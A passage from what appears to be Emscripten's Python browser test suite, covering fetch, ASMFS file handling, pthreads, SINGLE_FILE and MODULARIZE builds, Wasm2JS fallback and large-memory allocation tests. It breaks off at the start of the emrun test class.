shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/sync_xhr.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '--proxy-to-worker'],
also_asmjs=True)
# Tests waiting on EMSCRIPTEN_FETCH_WAITABLE request from a worker thread
@no_wasm_backend("emscripten_fetch_wait uses an asm.js based web worker")
@requires_threads
def test_fetch_sync_fetch_in_main_thread(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/sync_fetch_in_main_thread.cpp', expected='0', args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
@requires_threads
@no_wasm_backend("WASM2JS does not yet support pthreads")
def test_fetch_idb_store(self):
self.btest('fetch/idb_store.cpp', expected='0', args=['-s', 'USE_PTHREADS', '-s', 'FETCH', '-s', 'WASM=0', '-s', 'PROXY_TO_PTHREAD'])
@requires_threads
@no_wasm_backend("WASM2JS does not yet support pthreads")
def test_fetch_idb_delete(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/idb_delete.cpp', expected='0', args=['-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG', '-s', 'FETCH', '-s', 'WASM=0', '-s', 'PROXY_TO_PTHREAD'])
@requires_asmfs
@requires_threads
def test_asmfs_hello_file(self):
# Test basic file loading and the valid character set for files.
ensure_dir('dirrey')
shutil.copyfile(path_from_root('tests', 'asmfs', 'hello_file.txt'), os.path.join(self.get_dir(), 'dirrey', 'hello file !#$%&\'()+,-.;=@[]^_`{}~ %%.txt'))
self.btest_exit('asmfs/hello_file.cpp', expected='0', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG', '-s', 'PROXY_TO_PTHREAD'])
@requires_asmfs
@requires_threads
def test_asmfs_read_file_twice(self):
shutil.copyfile(path_from_root('tests', 'asmfs', 'hello_file.txt'), 'hello_file.txt')
self.btest_exit('asmfs/read_file_twice.cpp', expected='0', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG', '-s', 'PROXY_TO_PTHREAD'])
@requires_asmfs
@requires_threads
def test_asmfs_fopen_write(self):
self.btest_exit('asmfs/fopen_write.cpp', expected='0', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_mkdir_create_unlink_rmdir(self):
self.btest('cstdio/test_remove.cpp', expected='0', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_dirent_test_readdir(self):
self.btest('dirent/test_readdir.c', expected='0', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_dirent_test_readdir_empty(self):
self.btest('dirent/test_readdir_empty.c', expected='0', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_unistd_close(self):
self.btest_exit(path_from_root('tests', 'unistd', 'close.c'), 0, args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_unistd_access(self):
self.btest_exit(path_from_root('tests', 'unistd', 'access.c'), 0, args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_unistd_unlink(self):
# TODO: Once symlinks are supported, remove -DNO_SYMLINK=1
self.btest_exit(path_from_root('tests', 'unistd', 'unlink.c'), 0, args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG', '-DNO_SYMLINK=1'])
@requires_asmfs
@requires_threads
def test_asmfs_test_fcntl_open(self):
self.btest('fcntl/test_fcntl_open.c', expected='0', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG', '-s', 'PROXY_TO_PTHREAD'])
@requires_asmfs
@requires_threads
def test_asmfs_relative_paths(self):
self.btest_exit('asmfs/relative_paths.cpp', expected='0', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_threads
def test_pthread_locale(self):
for args in [
[],
['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2'],
]:
print("Testing with: ", args)
self.btest('pthread/test_pthread_locale.c', expected='1', args=args)
# Tests the Emscripten HTML5 API emscripten_set_canvas_element_size() and emscripten_get_canvas_element_size() functionality in singlethreaded programs.
def test_emscripten_set_canvas_element_size(self):
self.btest('emscripten_set_canvas_element_size.c', expected='1')
# Test that emscripten_get_device_pixel_ratio() is callable from pthreads (and proxies to main thread to obtain the proper window.devicePixelRatio value).
@requires_threads
def test_emscripten_get_device_pixel_ratio(self):
for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
self.btest('emscripten_get_device_pixel_ratio.c', expected='1', args=args)
# Tests that emscripten_run_script() variants of functions work in pthreads.
@requires_threads
def test_pthread_run_script(self):
for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_run_script.cpp'), expected='1', args=['-O3'] + args)
  # Tests emscripten_set_canvas_element_size() and OffscreenCanvas functionality in different build configurations.
  @requires_threads
  @requires_graphics_hardware
  def test_emscripten_animate_canvas_element_size(self):
    # Each configuration varies the main-loop style (emscripten_set_main_loop
    # vs. explicit context swap), proxying (PROXY_TO_PTHREAD) and the canvas
    # backend (OFFSCREEN_FRAMEBUFFER vs. OFFSCREENCANVAS_SUPPORT).
    for args in [
      ['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1'],
      ['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1'],
      ['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DTEST_EXPLICIT_CONTEXT_SWAP=1'],
      ['-DTEST_EXPLICIT_CONTEXT_SWAP=1', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1'],
      ['-DTEST_EXPLICIT_CONTEXT_SWAP=1', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DTEST_MANUALLY_SET_ELEMENT_CSS_SIZE=1'],
      ['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-s', 'OFFSCREENCANVAS_SUPPORT'],
    ]:
      cmd = ['-lGL', '-O3', '-g2', '--shell-file', path_from_root('tests', 'canvas_animate_resize_shell.html'), '-s', 'GL_DEBUG', '--threadprofiler'] + args
      print(' '.join(cmd))
      self.btest('canvas_animate_resize.cpp', expected='1', args=cmd)
# Tests the absolute minimum pthread-enabled application.
@requires_threads
def test_pthread_hello_thread(self):
for opts in [[], ['-O3']]:
for modularize in [[], ['-s', 'MODULARIZE', '-s', 'EXPORT_NAME=MyModule', '--shell-file', path_from_root('tests', 'shell_that_launches_modularize.html')]]:
self.btest(path_from_root('tests', 'pthread', 'hello_thread.c'), expected='1', args=['-s', 'USE_PTHREADS'] + modularize + opts)
# Tests that a pthreads build of -s MINIMAL_RUNTIME=1 works well in different build modes
def test_minimal_runtime_hello_pthread(self):
for opts in [[], ['-O3']]:
for modularize in [[], ['-s', 'MODULARIZE', '-s', 'EXPORT_NAME=MyModule']]:
self.btest(path_from_root('tests', 'pthread', 'hello_thread.c'), expected='1', args=['-s', 'MINIMAL_RUNTIME', '-s', 'USE_PTHREADS'] + modularize + opts)
# Tests memory growth in pthreads mode, but still on the main thread.
@requires_threads
def test_pthread_growth_mainthread(self):
self.emcc_args.remove('-Werror')
def run(emcc_args=[]):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_memory_growth_mainthread.c'), expected='1', args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'INITIAL_MEMORY=32MB', '-s', 'MAXIMUM_MEMORY=256MB'] + emcc_args, also_asmjs=False)
run()
run(['-s', 'PROXY_TO_PTHREAD'])
# Tests memory growth in a pthread.
@requires_threads
def test_pthread_growth(self):
self.emcc_args.remove('-Werror')
def run(emcc_args=[]):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_memory_growth.c'), expected='1', args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'INITIAL_MEMORY=32MB', '-s', 'MAXIMUM_MEMORY=256MB', '-g'] + emcc_args, also_asmjs=False)
run()
run(['-s', 'ASSERTIONS'])
run(['-s', 'PROXY_TO_PTHREAD'])
# Tests that time in a pthread is relative to the main thread, so measurements
# on different threads are still monotonic, as if checking a single central
# clock.
@requires_threads
def test_pthread_reltime(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_reltime.cpp'), expected='3', args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
  # Tests that it is possible to load the main .js file of the application manually via a Blob URL, and still use pthreads.
  @requires_threads
  def test_load_js_from_blob_with_pthreads(self):
    # TODO: enable this with wasm, currently pthreads/atomics have limitations
    self.compile_btest([path_from_root('tests', 'pthread', 'hello_thread.c'), '-s', 'USE_PTHREADS', '-o', 'hello_thread_with_blob_url.js'])
    # The shell html loads the generated .js via a Blob URL rather than a
    # normal script src.
    shutil.copyfile(path_from_root('tests', 'pthread', 'main_js_as_blob_loader.html'), 'hello_thread_with_blob_url.html')
    self.run_browser('hello_thread_with_blob_url.html', 'hello from thread!', '/report_result?1')
  # Tests that base64 utils work in browser with no native atob function
  def test_base64_atob_fallback(self):
    # Minimal program; the interesting part is the SINGLE_FILE packaging below.
    create_test_file('test.c', r'''
      #include <stdio.h>
      #include <emscripten.h>
      int main() {
        return 0;
      }
    ''')
    # generate a dummy file
    create_test_file('dummy_file', 'dummy')
    # compile the code with the modularize feature and the preload-file option enabled
    self.compile_btest(['test.c', '-s', 'EXIT_RUNTIME', '-s', 'MODULARIZE', '-s', 'EXPORT_NAME="Foo"', '--preload-file', 'dummy_file', '-s', 'SINGLE_FILE'])
    # The page clears both atob and fetch before loading the module, forcing
    # the JS base64-decoder fallback to be exercised.
    create_test_file('a.html', '''
      <script>
        atob = undefined;
        fetch = undefined;
      </script>
      <script src="a.out.js"></script>
      <script>
        var foo = Foo();
      </script>
    ''')
    self.run_browser('a.html', '...', '/report_result?exit:0')
# Tests that SINGLE_FILE works as intended in generated HTML (with and without Worker)
def test_single_file_html(self):
self.btest('single_file_static_initializer.cpp', '19', args=['-s', 'SINGLE_FILE'], also_proxied=True)
self.assertExists('test.html')
self.assertNotExists('test.js')
self.assertNotExists('test.worker.js')
self.assertNotExists('test.wasm')
self.assertNotExists('test.mem')
# Tests that SINGLE_FILE works as intended in generated HTML with MINIMAL_RUNTIME
def test_minimal_runtime_single_file_html(self):
for wasm in [0, 1]:
for opts in [[], ['-O3']]:
self.btest('single_file_static_initializer.cpp', '19', args=opts + ['-s', 'MINIMAL_RUNTIME', '-s', 'SINGLE_FILE', '-s', 'WASM=' + str(wasm)])
self.assertExists('test.html')
self.assertNotExists('test.js')
self.assertNotExists('test.wasm')
self.assertNotExists('test.asm.js')
self.assertNotExists('test.mem')
self.assertNotExists('test.js')
self.assertNotExists('test.worker.js')
# Tests that SINGLE_FILE works when built with ENVIRONMENT=web and Closure enabled (#7933)
def test_single_file_in_web_environment_with_closure(self):
self.btest('minimal_hello.c', '0', args=['-s', 'SINGLE_FILE', '-s', 'ENVIRONMENT=web', '-O2', '--closure', '1'])
  # Tests that SINGLE_FILE works as intended with locateFile
  def test_single_file_locate_file(self):
    for wasm_enabled in [True, False]:
      args = [path_from_root('tests', 'browser_test_hello_world.c'), '-o', 'test.js', '-s', 'SINGLE_FILE']
      if not wasm_enabled:
        args += ['-s', 'WASM=0']
      self.compile_btest(args)
      # With SINGLE_FILE everything is embedded, so locateFile must never be
      # asked to resolve a data: URI.
      create_test_file('test.html', '''
        <script>
          var Module = {
            locateFile: function (path) {
              if (path.indexOf('data:') === 0) {
                throw new Error('Unexpected data URI.');
              }
              return path;
            }
          };
        </script>
        <script src="test.js"></script>
      ''')
      self.run_browser('test.html', None, '/report_result?0')
  # Tests that SINGLE_FILE works as intended in a Worker in JS output
  def test_single_file_worker_js(self):
    self.compile_btest([path_from_root('tests', 'browser_test_hello_world.c'), '-o', 'test.js', '--proxy-to-worker', '-s', 'SINGLE_FILE'])
    create_test_file('test.html', '<script src="test.js"></script>')
    self.run_browser('test.html', None, '/report_result?0')
    # The worker code must have been embedded into test.js rather than
    # emitted as a separate test.worker.js file.
    self.assertExists('test.js')
    self.assertNotExists('test.worker.js')
  # Tests that pthreads code works as intended in a Worker. That is, a pthreads-using
  # program can run either on the main thread (normal tests) or when we start it in
  # a Worker in this test (in that case, both the main application thread and the worker threads
  # are all inside Web Workers).
  @requires_threads
  def test_pthreads_started_in_worker(self):
    self.compile_btest([path_from_root('tests', 'pthread', 'test_pthread_atomics.cpp'), '-o', 'test.js', '-s', 'INITIAL_MEMORY=64MB', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
    # Launch the compiled program inside a Worker instead of on the page's
    # main thread.
    create_test_file('test.html', '''
      <script>
        new Worker('test.js');
      </script>
    ''')
    self.run_browser('test.html', None, '/report_result?0')
  def test_access_file_after_heap_resize(self):
    # A preloaded file must remain readable after the wasm heap has grown.
    create_test_file('test.txt', 'hello from file')
    self.compile_btest([path_from_root('tests', 'access_file_after_heap_resize.c'), '-s', 'ALLOW_MEMORY_GROWTH', '--preload-file', 'test.txt', '-o', 'page.html'])
    self.run_browser('page.html', 'hello from file', '/report_result?15')
    # with separate file packager invocation
    self.run_process([FILE_PACKAGER, 'data.data', '--preload', 'test.txt', '--js-output=' + 'data.js'])
    self.compile_btest([path_from_root('tests', 'access_file_after_heap_resize.c'), '-s', 'ALLOW_MEMORY_GROWTH', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM'])
    self.run_browser('page.html', 'hello from file', '/report_result?15')
def test_unicode_html_shell(self):
create_test_file('main.cpp', r'''
int main() {
REPORT_RESULT(0);
return 0;
}
''')
create_test_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('Emscripten-Generated Code', 'Emscripten-Generated Emoji 😅'))
self.compile_btest(['main.cpp', '--shell-file', 'shell.html', '-o', 'test.html'])
self.run_browser('test.html', None, '/report_result?0')
# Tests the functionality of the emscripten_thread_sleep() function.
@requires_threads
def test_emscripten_thread_sleep(self):
self.btest(path_from_root('tests', 'pthread', 'emscripten_thread_sleep.c'), expected='1', args=['-s', 'USE_PTHREADS', '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["print"]'])
# Tests that Emscripten-compiled applications can be run from a relative path in browser that is different than the address of the current page
def test_browser_run_from_different_directory(self):
self.compile_btest([path_from_root('tests', 'browser_test_hello_world.c'), '-o', 'test.html', '-O3'])
ensure_dir('subdir')
shutil.move('test.js', os.path.join('subdir', 'test.js'))
shutil.move('test.wasm', os.path.join('subdir', 'test.wasm'))
src = open('test.html').read()
# Make sure JS is loaded from subdirectory
create_test_file('test-subdir.html', src.replace('test.js', 'subdir/test.js'))
self.run_browser('test-subdir.html', None, '/report_result?0')
  # Similar to `test_browser_run_from_different_directory`, but asynchronous because of `-s MODULARIZE=1`
  def test_browser_run_from_different_directory_async(self):
    # MODULARIZE defers startup, so both documented ('Module();') and
    # tolerated ('new Module();') instantiation styles are checked.
    for args, creations in [
      (['-s', 'MODULARIZE'], [
        'Module();', # documented way for using modularize
        'new Module();' # not documented as working, but we support it
      ]),
    ]:
      print(args)
      # compile the code with the modularize feature and the preload-file option enabled
      self.compile_btest([path_from_root('tests', 'browser_test_hello_world.c'), '-o', 'test.js', '-O3'] + args)
      ensure_dir('subdir')
      shutil.move('test.js', os.path.join('subdir', 'test.js'))
      shutil.move('test.wasm', os.path.join('subdir', 'test.wasm'))
      for creation in creations:
        print(creation)
        # Make sure JS is loaded from subdirectory
        create_test_file('test-subdir.html', '''
          <script src="subdir/test.js"></script>
          <script>
            %s
          </script>
        ''' % creation)
        self.run_browser('test-subdir.html', None, '/report_result?0')
# Similar to `test_browser_run_from_different_directory`, but
# also also we eval the initial code, so currentScript is not present. That prevents us
# from finding the file in a subdir, but here we at least check we do not regress compared to the
# normal case of finding in the current dir.
def test_browser_modularize_no_current_script(self):
# test both modularize (and creating an instance) and modularize-instance
# (which creates by itself)
for path, args, creation in [
([], ['-s', 'MODULARIZE'], 'Module();'),
(['subdir'], ['-s', 'MODULARIZE'], 'Module();'),
]:
print(path, args, creation)
filesystem_path = os.path.join('.', *path)
ensure_dir(filesystem_path)
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest([path_from_root('tests', 'browser_test_hello_world.c'), '-o', 'test.js'] + args)
shutil.move('test.js', os.path.join(filesystem_path, 'test.js'))
shutil.move('test.wasm', os.path.join(filesystem_path, 'test.wasm'))
open(os.path.join(filesystem_path, 'test.html'), 'w').write('''
<script>
setTimeout(function() {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'test.js', false);
xhr.send(null);
eval(xhr.responseText);
%s
}, 1);
</script>
''' % creation)
self.run_browser('/'.join(path + ['test.html']), None, '/report_result?0')
def test_emscripten_request_animation_frame(self):
self.btest(path_from_root('tests', 'emscripten_request_animation_frame.c'), '0')
def test_emscripten_request_animation_frame_loop(self):
self.btest(path_from_root('tests', 'emscripten_request_animation_frame_loop.c'), '0')
def test_request_animation_frame(self):
self.btest('request_animation_frame.cpp', '0', also_proxied=True)
@requires_threads
def test_emscripten_set_timeout(self):
self.btest(path_from_root('tests', 'emscripten_set_timeout.c'), '0', args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
@requires_threads
def test_emscripten_set_timeout_loop(self):
self.btest(path_from_root('tests', 'emscripten_set_timeout_loop.c'), '0', args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
def test_emscripten_set_immediate(self):
self.btest(path_from_root('tests', 'emscripten_set_immediate.c'), '0')
def test_emscripten_set_immediate_loop(self):
self.btest(path_from_root('tests', 'emscripten_set_immediate_loop.c'), '0')
@requires_threads
def test_emscripten_set_interval(self):
self.btest(path_from_root('tests', 'emscripten_set_interval.c'), '0', args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
# Test emscripten_performance_now() and emscripten_date_now()
@requires_threads
def test_emscripten_performance_now(self):
self.btest(path_from_root('tests', 'emscripten_performance_now.c'), '0', args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
@requires_threads
def test_embind_with_pthreads(self):
self.btest('embind_with_pthreads.cpp', '1', args=['--bind', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
def test_embind_with_asyncify(self):
self.btest('embind_with_asyncify.cpp', '1', args=['--bind', '-s', 'ASYNCIFY'])
# Test emscripten_console_log(), emscripten_console_warn() and emscripten_console_error()
def test_emscripten_console_log(self):
self.btest(path_from_root('tests', 'emscripten_console_log.c'), '0', args=['--pre-js', path_from_root('tests', 'emscripten_console_log_pre.js')])
def test_emscripten_throw_number(self):
self.btest(path_from_root('tests', 'emscripten_throw_number.c'), '0', args=['--pre-js', path_from_root('tests', 'emscripten_throw_number_pre.js')])
def test_emscripten_throw_string(self):
self.btest(path_from_root('tests', 'emscripten_throw_string.c'), '0', args=['--pre-js', path_from_root('tests', 'emscripten_throw_string_pre.js')])
# Tests that Closure run in combination with -s ENVIRONMENT=web mode works with a minimal console.log() application
def test_closure_in_web_only_target_environment_console_log(self):
self.btest('minimal_hello.c', '0', args=['-s', 'ENVIRONMENT=web', '-O3', '--closure', '1'])
# Tests that Closure run in combination with -s ENVIRONMENT=web mode works with a small WebGL application
@requires_graphics_hardware
def test_closure_in_web_only_target_environment_webgl(self):
self.btest('webgl_draw_triangle.c', '0', args=['-lGL', '-s', 'ENVIRONMENT=web', '-O3', '--closure', '1'])
def test_no_declare_asm_module_exports_asmjs(self):
for minimal_runtime in [[], ['-s', 'MINIMAL_RUNTIME']]:
self.btest(path_from_root('tests', 'declare_asm_module_exports.cpp'), '1', args=['-s', 'DECLARE_ASM_MODULE_EXPORTS=0', '-s', 'ENVIRONMENT=web', '-O3', '--closure', '1', '-s', 'WASM=0'] + minimal_runtime)
def test_no_declare_asm_module_exports_wasm_minimal_runtime(self):
self.btest(path_from_root('tests', 'declare_asm_module_exports.cpp'), '1', args=['-s', 'DECLARE_ASM_MODULE_EXPORTS=0', '-s', 'ENVIRONMENT=web', '-O3', '--closure', '1', '-s', 'MINIMAL_RUNTIME'])
# Tests that the different code paths in src/shell_minimal_runtime.html all work ok.
def test_minimal_runtime_loader_shell(self):
args = ['-s', 'MINIMAL_RUNTIME=2']
for wasm in [[], ['-s', 'WASM=0', '--memory-init-file', '0'], ['-s', 'WASM=0', '--memory-init-file', '1'], ['-s', 'SINGLE_FILE'], ['-s', 'WASM=0', '-s', 'SINGLE_FILE']]:
for modularize in [[], ['-s', 'MODULARIZE']]:
print(str(args + wasm + modularize))
self.btest('minimal_hello.c', '0', args=args + wasm + modularize)
# Tests that -s MINIMAL_RUNTIME=1 works well in different build modes
def test_minimal_runtime_hello_world(self):
for args in [[], ['-s', 'MINIMAL_RUNTIME_STREAMING_WASM_COMPILATION', '--closure', '1'], ['-s', 'MINIMAL_RUNTIME_STREAMING_WASM_INSTANTIATION', '--closure', '1']]:
self.btest(path_from_root('tests', 'small_hello_world.c'), '0', args=args + ['-s', 'MINIMAL_RUNTIME'])
@requires_threads
def test_offset_converter(self, *args):
try:
self.btest_exit(path_from_root('tests', 'browser', 'test_offset_converter.c'), '1', args=['-s', 'USE_OFFSET_CONVERTER', '-g4', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS'])
except Exception as e:
# dump the wasm file; this is meant to help debug #10539 on the bots
print(self.run_process([os.path.join(building.get_binaryen_bin(), 'wasm-opt'), 'test.wasm', '-g', '--print', '-all'], stdout=PIPE).stdout)
raise e
# Tests emscripten_unwind_to_js_event_loop() behavior
def test_emscripten_unwind_to_js_event_loop(self, *args):
self.btest(path_from_root('tests', 'browser', 'test_emscripten_unwind_to_js_event_loop.c'), '1', args=['-s', 'NO_EXIT_RUNTIME'])
def test_wasm2js_fallback(self):
for args in [[], ['-s', 'MINIMAL_RUNTIME']]:
self.compile_btest([path_from_root('tests', 'small_hello_world.c'), '-s', 'WASM=2', '-o', 'test.html'] + args)
# First run with WebAssembly support enabled
# Move the Wasm2js fallback away to test it is not accidentally getting loaded.
os.rename('test.wasm.js', 'test.wasm.js.unused')
self.run_browser('test.html', 'hello!', '/report_result?0')
os.rename('test.wasm.js.unused', 'test.wasm.js')
# Then disable WebAssembly support in VM, and try again.. Should still work with Wasm2JS fallback.
html = open('test.html', 'r').read()
html = html.replace('<body>', '<body><script>delete WebAssembly;</script>')
open('test.html', 'w').write(html)
os.remove('test.wasm') # Also delete the Wasm file to test that it is not attempted to be loaded.
self.run_browser('test.html', 'hello!', '/report_result?0')
  def test_wasm2js_fallback_on_wasm_compilation_failure(self):
    # With -s WASM=2 both a .wasm and a .wasm.js fallback are emitted; verify
    # the fallback kicks in when .wasm compilation fails.
    for args in [[], ['-s', 'MINIMAL_RUNTIME']]:
      self.compile_btest([path_from_root('tests', 'small_hello_world.c'), '-s', 'WASM=2', '-o', 'test.html'] + args)
      # Run without the .wasm.js file present: with Wasm support, the page should still run
      os.rename('test.wasm.js', 'test.wasm.js.unused')
      self.run_browser('test.html', 'hello!', '/report_result?0')
      # Restore the .wasm.js file, then corrupt the .wasm file, that should trigger the Wasm2js fallback to run
      os.rename('test.wasm.js.unused', 'test.wasm.js')
      shutil.copyfile('test.js', 'test.wasm')
      self.run_browser('test.html', 'hello!', '/report_result?0')
def test_system(self):
self.btest(path_from_root('tests', 'system.c'), '0')
  # Tests that it is possible to hook into/override a symbol defined in a system library.
  @requires_graphics_hardware
  def test_override_system_js_lib_symbol(self):
    # This test verifies it is possible to override a symbol from WebGL library.

    # When WebGL is implicitly linked in, the implicit linking should happen before any user --js-libraries, so that they can adjust
    # the behavior afterwards.
    self.btest(path_from_root('tests', 'test_override_system_js_lib_symbol.c'),
               expected='5121',
               args=['--js-library', path_from_root('tests', 'test_override_system_js_lib_symbol.js')])

    # When WebGL is explicitly linked to in strict mode, the linking order on command line should enable overriding.
    self.btest(path_from_root('tests', 'test_override_system_js_lib_symbol.c'),
               expected='5121',
               args=['-s', 'AUTO_JS_LIBRARIES=0', '-lwebgl.js', '--js-library', path_from_root('tests', 'test_override_system_js_lib_symbol.js')])
@no_firefox('no 4GB support yet')
def test_zzz_zzz_4gb(self):
# TODO Convert to an actual browser test when it reaches stable.
# For now, keep this in browser as this suite runs serially, which
# means we don't compete for memory with anything else (and run it
# at the very very end, to reduce the risk of it OOM-killing the
# browser).
# test that we can allocate in the 2-4GB range, if we enable growth and
# set the max appropriately
self.emcc_args += ['-O2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'MAXIMUM_MEMORY=4GB']
self.do_run_in_out_file_test('tests', 'browser', 'test_4GB.cpp', js_engines=[config.V8_ENGINE])
# Tests that emmalloc supports up to 4GB Wasm heaps.
@no_firefox('no 4GB support yet')
def test_zzz_zzz_emmalloc_4gb(self):
self.btest(path_from_root('tests', 'mem_growth.cpp'),
expected='-65536', # == 4*1024*1024*1024 - 65536 casted to signed
args=['-s', 'MALLOC=emmalloc', '-s', 'ABORTING_MALLOC=0', '-s', 'ALLOW_MEMORY_GROWTH=1', '-s', 'MAXIMUM_MEMORY=4GB'])
# Test that it is possible to malloc() a huge 3GB memory block in 4GB mode using emmalloc.
# Also test emmalloc-memvalidate and emmalloc-memvalidate-verbose build configurations.
@no_firefox('no 4GB support yet')
def test_emmalloc_3GB(self):
def test(args):
self.btest(path_from_root('tests', 'alloc_3gb.cpp'),
expected='0',
args=['-s', 'MAXIMUM_MEMORY=4GB', '-s', 'ALLOW_MEMORY_GROWTH=1'] + args)
test(['-s', 'MALLOC=emmalloc'])
test(['-s', 'MALLOC=emmalloc-debug'])
test(['-s', 'MALLOC=emmalloc-memvalidate'])
test(['-s', 'MALLOC=emmalloc-memvalidate-verbose'])
@no_firefox('no 4GB support yet')
def test_zzz_zzz_2gb_fail(self):
# TODO Convert to an actual browser test when it reaches stable.
# For now, keep this in browser as this suite runs serially, which
# means we don't compete for memory with anything else (and run it
# at the very very end, to reduce the risk of it OOM-killing the
# browser).
# test that growth doesn't go beyond 2GB without the max being set for that,
# and that we can catch an allocation failure exception for that
self.emcc_args += ['-O2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'MAXIMUM_MEMORY=2GB']
self.do_run_in_out_file_test('tests', 'browser', 'test_2GB_fail.cpp', js_engines=[config.V8_ENGINE])
@no_firefox('no 4GB support yet')
def test_zzz_zzz_4gb_fail(self):
# TODO Convert to an actual browser test when it reaches stable.
# For now, keep this in browser as this suite runs serially, which
# means we don't compete for memory with anything else (and run it
# at the very very end, to reduce the risk of it OOM-killing the
# browser).
# test that we properly report an allocation error that would overflow over
# 4GB.
self.emcc_args += ['-O2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'MAXIMUM_MEMORY=4GB', '-s', 'ABORTING_MALLOC=0']
self.do_run_in_out_file_test('tests', 'browser', 'test_4GB_fail.cpp', js_engines=[config.V8_ENGINE])
  @disabled("only run this manually, to test for race conditions")
  @parameterized({
    'normal': ([],),
    'assertions': (['-s', 'ASSERTIONS'],)
  })
  @requires_threads
  def test_manual_pthread_proxy_hammer(self, args):
    # the specific symptom of the hang that was fixed is that the test hangs
    # at some point, using 0% CPU. often that occured in 0-200 iterations, but
    # you may want to adjust "ITERATIONS".
    self.btest(path_from_root('tests', 'pthread', 'test_pthread_proxy_hammer.cpp'),
               expected='0',
               args=['-s', 'USE_PTHREADS', '-O2', '-s', 'PROXY_TO_PTHREAD',
                     '-DITERATIONS=1024', '-g1'] + args,
               timeout=10000,
               # don't run this with the default extra_tries value, as this is
               # *meant* to notice something random, a race condition.
               extra_tries=0)
class emrun(RunnerCore):
  """End-to-end tests for the `emrun` helper that launches compiled pages
  in a real browser; all tests skip when no browser is available."""

  def test_emrun_info(self):
    """emrun's --system_info/--browser_info/--list_browsers queries should
    produce output without raising (no 'Traceback' in stdout)."""
    if not has_browser():
      self.skipTest('need a browser')
    result = self.run_process([path_from_root('emrun'), '--system_info', '--browser_info'], stdout=PIPE).stdout
    assert 'CPU' in result
    assert 'Browser' in result
    assert 'Traceback' not in result

    result = self.run_process([path_from_root('emrun'), '--list_browsers'], stdout=PIPE).stdout
    assert 'Traceback' not in result

  def test_emrun(self):
    """Compile a program with --emrun and verify emrun can launch it, pass
    page arguments through `--`, capture stdout/stderr to log files, and
    propagate the page's exit code (100)."""
